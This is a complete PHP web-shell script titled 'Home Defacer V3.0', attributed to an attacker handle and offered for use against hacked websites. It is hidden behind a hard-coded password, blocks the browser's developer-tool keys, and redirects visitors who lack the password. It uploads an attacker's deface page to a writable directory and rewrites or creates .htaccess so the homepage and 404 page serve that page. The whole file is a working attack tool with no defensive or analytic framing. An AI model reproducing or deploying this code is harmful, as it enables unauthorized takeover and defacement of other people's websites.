Home Defacer V3.0

1. <? 
2.     //Respect Coders
3.     //Leeching My Script wont make you a real Coders ~Mauritania Attacker
4.     if(!isset($_GET['spade'])){
5.         echo "<h1>Not Found!</h1>";
6.     }else{
7.         $spade = $_GET['spade'];
8.         $pass = "azazel"; //<====Change this if you want :)) Usage:: ?spade=*the password you set here :))
9.         if($spade == ""){ sleep(1); die('<meta http-equiv="refresh" content="0; URL=https://goo.gl/6o6XE0">');}
10.         if($spade != $pass){ sleep(1); die('<meta http-equiv="refresh" content="0; URL=https://goo.gl/6o6XE0">');}else{
11.             $file = basename(__FILE__, '.php');  
12.             echo "<script>
13.             document.onkeypress = function (event) { event = (event || window.event);
14.        if (event.keyCode == 123) { return false; }
15.        if((event.keyCode == 16) || (event.keyCode == 17) || (event.keyCode == 73)){ return false; } }
16.             document.onkeydown = function (event) { event = (event || window.event);
17.        if (event.keyCode == 123) { return false; }
18.        if((event.keyCode == 16) || (event.keyCode == 17) || (event.keyCode == 73)){ return false; } }
19.             document.onkeyup = function (event) { event = (event || window.event);
20.        if (event.keyCode == 123) { return false; }
21.        if((event.keyCode == 16) || (event.keyCode == 17) || (event.keyCode == 73)){ return false; } }
22.             </script>
23.             <center><h1>HOME DEFACE V3.0</h1><br><h2>Coded by Spade</h2><br><i>I Created this because many script kiddies nowadays cant backup a single index.php file</i>
24.             <form action='".$file.".php?spade=".$pass."' method=post enctype='multipart/form-data'>
25.                 Navigate to Main Directory: #~>
26.                     <input type='text' name='dir' value='".getcwd()."'><br>
27.                 Put your Deface Page Here: #~>
28.                     <input type='file' name='file'><br />
29.                     <input name='_upl' type='submit' id='_upl' value='Home Deface'/>
30.             </form>";
31.                 if(isset($_POST['dir']) && (!empty($_POST['dir']))){
32.                     $dir = $_POST['dir'];
33.                     sleep(2);
34.                     echo "<font color=blue>Checking if [{$dir}] is Directory!</font><br>";
35.                     if(!is_dir($dir)){
36.                         die('<font color=red>[{$dir}] is not Directory!</font>');
37.                         exit;
38.                     }else{
39.                         echo "<font color=black>[{$dir}] is Directory!</font><br><font color=blue>Checking if Dir[{$dir}] is Writable!</font><br>";
40.                         sleep(1);
41.                         if(!is_writable($dir)){
42.                             die('<font color=red>[{$dir}] is not Writable!</font>');
43.                             exit;
44.                         }else{                                             
45.                             echo "<font color=black>[{$dir}] is Writable!</font><br>";
46.                                 global $dir;
47.                                 if($directory = opendir($dir)){
48.                                     if(readdir($directory)){
49.                                         $temp = explode(".",$_FILES["file"]["name"]);
50.                                         $newfile = "spade.".end($temp);
51.                                         if(@copy($_FILES["file"]["tmp_name"], $dir.$newfile)){
52.                                             echo "<font color=black>File Uploaded!</font><br><font color=blue>Checking if Target File Exists!</font><br>";
53.                                             $targetfile = ".htaccess";
54.                                             if(!file_exists($dir.$targetfile)){
55.                                                 echo "<font color=red>Target File not Found!</font><br><font color=black>Creating that File :)</font><br>";
56.                                                 $htaccess = "####SPADE WAS HERE####\nDirectoryIndex {$newfile}\nErrorDocument 404 /{$newfile}";
57.                                                 $fopen = fopen($dir.".htaccess","w");
58.                                                 $fwrite = fwrite($fopen, $htaccess);
59.                                                 if(!$fwrite){ echo "<font color=red>Cant Create Target File in {$dir}</font><br>";}else{                       
60.                                                 echo "<font color=black>Target File Created in {$dir}</font><br><font color=black><a href='http://".$_SERVER['SERVER_NAME']."/' target='_blank'>>>Check Homepage<<</a></font>";
61.                                                 }
62.                                                 fclose($fopen);
63.                                             }else{
64.                                                 echo "<font color=black>Target File Found!</font><br>";
65.                                                 $htaccess = "####SPADE WAS HERE####\nDirectoryIndex {$newfile}\nErrorDocument 404 /{$newfile}";
66.                                                 if(@is_file($dir.$targetfile)&&@is_writable($dir.$targetfile)){ $put = @file_put_contents($dir.$targetfile, $htaccess."\n".@file_get_contents($dir.$targetfile)); if($put){ echo "<font color=black><a href='http://".$_SERVER['SERVER_NAME']."/' target='_blank'>>>Check Homepage<<</a></font>"; }else{ echo "<font color=red>An Error Occured!</font>"; }}
67.                                             }//if htaccess exists
68.                                         }//if file uploaded
69.                                     }//readdir
70.                                 }//opendir
71.                         }// if directory is writable
72.                     }// if input is dir
73.                 }
74.             echo "</center>";
75.         }//Spade == to its password
76.     }//if ?spade Not Found
77. ?>